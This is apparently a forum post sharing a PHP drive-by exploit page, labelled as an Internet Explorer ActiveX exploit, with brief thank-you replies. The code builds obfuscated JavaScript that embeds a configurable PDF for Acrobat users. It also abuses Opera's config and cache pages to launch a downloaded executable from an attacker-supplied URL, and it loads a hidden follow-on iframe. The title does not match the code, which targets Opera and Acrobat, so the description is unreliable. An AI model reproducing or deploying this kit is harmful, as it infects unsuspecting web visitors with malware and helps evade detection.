ActiveX Control - Exploit (IE 6,7,8)

[A25414N]

Code:

<?
                        error_reporting(0);
                        set_time_limit(0);
                        include"cfg/config.php";
        function get_random_string( $len )
        {
                $result = "";
                $nums = "1234567890";
                $syms = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
                $sux = $nums.$syms;

                for ($i = 0; $i <= $len; $i++ )
                {
                        $num = rand( 0, strlen( $sux ) - 1 );
                        $result .= $sux[ $num ];
                }

                return $syms[ rand(0,strlen( $syms ) - 1 ) ].$result;
        }
        function delete( $content )
        {
            $content = str_replace( "\n", "", $content );
            $content = str_replace( "\r", "", $content );
            $content = str_replace( "\t", "", $content );
            $content = str_replace( " ", "", $content );            
            $content = str_replace( "function", "function ", $content );
            $content = str_replace( "var", "var ", $content );
            $content = str_replace( "newArray", "new Array ", $content );
            $content = str_replace( "return", "return ", $content );
            $content = str_replace( "divid", "div id", $content );    
            $content = str_replace( "elseif", "else if", $content );                
            
            return $content;
        }
        function crypts($content) {
                if(empty($content)) return '';
                $content = str_replace("\r"," ",$content);
                $content = str_replace("\n"," ",$content);
                $content = str_replace("\t"," ",$content);
                for($i = 0;$i < 10;$i ++){
                        $content = str_replace("  "," ",$content);
                }
                $table = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_@";
                $xor   = rand(5,255);
                $table = array_keys(count_chars($table, 1));
                $i_min = min($table);
                $i_max = max($table);
                $r = 0;
                $enc="";
                for ($c = count($table); $c > 0; $r = mt_rand(0, $c--)) array_splice($table, $r, $c - $r, array_reverse(array_slice($table, $r, $c - $r)));
                $len = strlen($content);
                $word = $shift = 0;
                for ($i = 0; $i < $len; $i++)
                {
                        $ch = $xor ^ ord($content[$i]);
                        $word |= ($ch << $shift);
                        $shift = ($shift + 2) % 6;
                        $enc .= chr($table[$word & 0x3F]);
                        $word >>= 6;
                        if (!$shift)
                        {
                                $enc .= chr($table[$word]);
                                $word >>= 9;
                        }
                }
                if ($shift) $enc .= chr($table[$word]);
                $tbl = array_fill($i_min, $i_max - $i_min + 1, 0);
                while (list($k,$v) = each($table)) $tbl[$v] = $k;
                $tbl = implode(",", $tbl);
                $func_name = get_random_string( rand( 3,12 ) );
                $func_param = get_random_string( rand( 3,12 ) );
                $l_param = get_random_string( rand( 3,12 ) );
                $b_param = get_random_string( rand( 3,12 ) );
                $i_param = get_random_string( rand( 3,12 ) );
                $j_param = get_random_string( rand( 3,12 ) );
                $r_param = get_random_string( rand( 3,12 ) );
                $p_param = get_random_string( rand( 3,12 ) );
                $s_param = get_random_string( rand( 3,12 ) );
                $w_param = get_random_string( rand( 3,12 ) );
                $t_param = get_random_string( rand( 3,12 ) );
                $buffer = get_random_string( rand( 3,12 ) );
                $null = get_random_string( rand( 3,12 ) );
                $f_fromCharCode = get_random_string( rand( 3,12 ) );
                $p_fromCharCode = get_random_string( rand( 3,12 ) );
                $chnyaga1 = get_random_string( rand( 3,12 ) );

                $a=get_random_string( rand( 3,12 ) );
                $b=get_random_string( rand( 3,12 ) );
                $c=get_random_string( rand( 3,12 ) );
                $d=get_random_string( rand( 3,12 ) );
                $a1=get_random_string( rand( 3,12 ) );
                $b1=get_random_string( rand( 3,12 ) );
                $c1=get_random_string( rand( 3,12 ) );
                $d1=get_random_string( rand( 3,12 ) );
                $a2=get_random_string( rand( 3,12 ) );
                $b2=get_random_string( rand( 3,12 ) );
                $c2=get_random_string( rand( 3,12 ) );
                $d2=get_random_string( rand( 3,12 ) );
                $a3=get_random_string( rand( 3,12 ) );
                $b3=get_random_string( rand( 3,12 ) );
                $c3=get_random_string( rand( 3,12 ) );
                $d3=get_random_string( rand( 3,12 ) );
                $a4=get_random_string( rand( 3,12 ) );
                $d4=get_random_string( rand( 3,12 ) );        
                
                $r= '
                var '.$a.'="";
                var '.$b.'="";
                function '.$c.'( '.$a2.' ) {
                    var '.$d.' = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
                    var '.$a1.', '.$b1.', '.$c1.', '.$d1.', '.$b2.', '.$c2.', '.$d2.', '.$a3.', '.$b3.' = '.$c3.' = 0, '.$d3.' = "", '.$d4.' = [];
                    '.$a2.' += "";
                    do {  
                        '.$d1.' = '.$d.'.indexOf('.$a2.'.charAt('.$b3.'++));
                        '.$b2.' = '.$d.'.indexOf('.$a2.'.charAt('.$b3.'++));
                        '.$c2.' = '.$d.'.indexOf('.$a2.'.charAt('.$b3.'++));
                        '.$d2.' = '.$d.'.indexOf('.$a2.'.charAt('.$b3.'++));
                        '.$a3.' = '.$d1.'<<18 | '.$b2.'<<12 | '.$c2.'<<6 | '.$d2.';
                        '.$a1.' = '.$a3.'>>16 & 0xff;
                        '.$b1.' = '.$a3.'>>8 & 0xff;
                        '.$c1.' = '.$a3.' & 0xff;
                        if ('.$c2.' == 64) {
                            '.$d4.'['.$c3.'++] = String.fromCharCode('.$a1.');
                        } else if ('.$d2.' == 64) {
                            '.$d4.'['.$c3.'++] = String.fromCharCode('.$a1.', '.$b1.');
                        } else {
                            '.$d4.'['.$c3.'++] = String.fromCharCode('.$a1.', '.$b1.', '.$c1.');
                        }
                    } while ('.$b3.' < '.$a2.'.length);
                    '.$d3.' = '.$d4.'.join("");
                    '.$d3.' = '.$a4.'('.$d3.');
                    return '.$d3.';
                }
                function '.$a4.' ( '.$a1.' ) {
                    var '.$b1.' = [], '.$c1.' = '.$d1.' = '.$a2.' = '.$b2.' = '.$c2.' = 0;
                    '.$a1.' += "";
                    while ( '.$c1.' < '.$a1.'.length ) {
                        '.$a2.' = '.$a1.'.charCodeAt('.$c1.');
                        if ('.$a2.' < 128) {
                            '.$b1.'['.$d1.'++] = String.fromCharCode('.$a2.');
                            '.$c1.'++;
                        } else if (('.$a2.' > 191) && ('.$a2.' < 224)) {
                            '.$b2.' = '.$a1.'.charCodeAt('.$c1.'+1);
                            '.$b1.'['.$d1.'++] = String.fromCharCode((('.$a2.' & 31) << 6) | ('.$b2.' & 63));
                            '.$c1.' += 2;
                        } else {
                            '.$b2.' = '.$a1.'.charCodeAt('.$c1.'+1);
                            '.$c2.' = '.$a1.'.charCodeAt('.$c1.'+2);
                            '.$b1.'['.$d1.'++] = String.fromCharCode((('.$a2.' & 15) << 12) | (('.$b2.' & 63) << 6) | ('.$c2.' & 63));
                            '.$c1.' += 3;
                        }
                    }
                    return '.$b1.'.join("");
                }                
                
        '.$a.'= '.$c.'("'.base64_encode(base64_encode('function '.$f_fromCharCode.'('.$p_fromCharCode.'){ return String[\'fromCharCode\']('.$p_fromCharCode.');} function '.$func_name.'('.$func_param.'){ var '.$null.'=0, '.$l_param.'='.$func_param.'.length, '.$b_param.'=1024, '.$i_param.', '.$j_param.', '.$r_param.'=\'\', '.$p_param.'='.$null.', '.$s_param.'='.$null.', '.$w_param.'='.$null.', '.$t_param.'=Array('.$tbl.'); for('.$j_param.'=Math.ceil('.$l_param.'/'.$b_param.');'.$j_param.'>'.$null.';'.$j_param.'--){ for('.$i_param.'=Math.min('.$l_param.','.$b_param.');'.$i_param.'>'.$null.';'.$i_param.'--,'.$l_param.'--){ '.$w_param.'|=('.$t_param.'['.$func_param.'.charCodeAt('.$p_param.'++)-'.$i_min.'])<<'.$s_param.'; if('.$s_param.'){ '.$r_param.'+='.$f_fromCharCode.'('.$xor.'^'.$w_param.'&255); '.$w_param.'>>=8; '.$s_param.'-=2; } else { '.$s_param.'=6; } } } eval('.$r_param.'); } '.$func_name.'(\''.$enc.'\');')).'");
        '.$b.'='.$c.'('.$a.');
        eval('.$b.');
        ';
        return $r;
        }
                        echo "<html><body><script>\n";
                        $content= "
                        function pdf() {
                                for (var i=0;i<navigator.plugins.length;i++) {
                                        var name = navigator.plugins[i].name;
                                        if (name.indexOf('Adobe Acrobat') != -1) {
                                              var my_div = document.createElement('div');
                                              my_div.innerHTML = '<embed width=100 height=100 src=\'".$pdf."\' type=\'application/pdf\'></embed>';
                                              document.body.appendChild(my_div);
                                              return 0;
                                        }
                                   }
                        }

                        function telnet() {
                        blank_iframe = document.createElement('iframe');
                        blank_iframe.src = 'about:blank';
                        blank_iframe.setAttribute('id', 'blank_iframe_window');
                        blank_iframe.setAttribute('style', 'display:none');
                        document.appendChild(blank_iframe);
                        blank_iframe_window.eval(
                                \"var st;\"+
                                \"config_iframe = document.createElement('iframe');\"+
                                \"config_iframe.setAttribute('id', 'config_iframe_window');\"+
                                \"config_iframe.src = 'opera:config';\"+
                                \"document.appendChild(config_iframe);\"+
                                \"app_iframe = document.createElement('img');\"+
                                \"app_iframe.src = '".$url."';\"+
                                \"document.appendChild(app_iframe);\"+
                                \"getcache();\"+
                                \"function getcache(){\"+
                                        \"cache_iframe = document.createElement('iframe');\"+
                                        \"cache_iframe.src = 'opera:cache';\"+
                                        \"cache_iframe.onload = function (){\"+
                                                \"cache = cache_iframe.contentDocument.childNodes[0].innerHTML.toUpperCase();\"+
                                                \"var re = new RegExp('(OPR\\\\\\\\\w{5}.EXE)</TD>\\\\\\\\\s*<TD>\\\\\\\\\d+</TD>\\\\\\\\\s*<TD><A HREF=\\\"'+'".strtoupper($url."\\\\\\\\\?")."','');\"+
                                                \"filename = cache.match(re);\"+
                                                \"if(!filename)return(0);\"+
                                                \"config_iframe_window.eval(\"+
                                                        \"\\\"opera.setPreference('Network','TN3270 App',opera.getPreference('User Prefs','Cache Directory4')+parent.filename[1]);\\\"+\"+
                                                        \"\\\"app_link = document.createElement('a');\\\"+\"+
                                                        \"\\\"app_link.setAttribute('href', 'tn3270://nothing');\\\"+\"+
                                                        \"\\\"app_link.click();\\\"+\"+
                                                        \"\\\"setTimeout(function(){opera.setPreference('Network','TN3270 App','telnet.exe');},1000);\\\"\"+
                                                \");\"+
                                                \"clearTimeout(st);\"+
                                                \"knock_iframe = document.createElement('iframe');\"+
                                                \"knock_iframe.src = '".$url."';\"+
                                                \"document.appendChild(knock_iframe);\"+
                                                \"return(0);\"+
                                        \"};\"+
                                        \"document.appendChild(cache_iframe);\"+
                                        \"st = setTimeout(function(){getcache();},2000);\"+
                                        \"return(0);\"+
                                \"}\"
                        );
                        }
                        pdf();
                        telnet();
                        setTimeout('vparivatel()',60000);
                        function vparivatel(){
                                 document.write('<iframe src=\'vparivatel.php\' style=\'display:none;\'></iframe>');
                                }
                        ";
                        echo delete(crypts($content));
                        echo "</script></body></html>";
?>

have fun

Credit : xakepy.cc

[fenndora]

MAntaap ...

Bantuin sundul ajja gan..

[Fauzi Topan]

R.I.P Internet Explorer
terima kasih bang exploitnya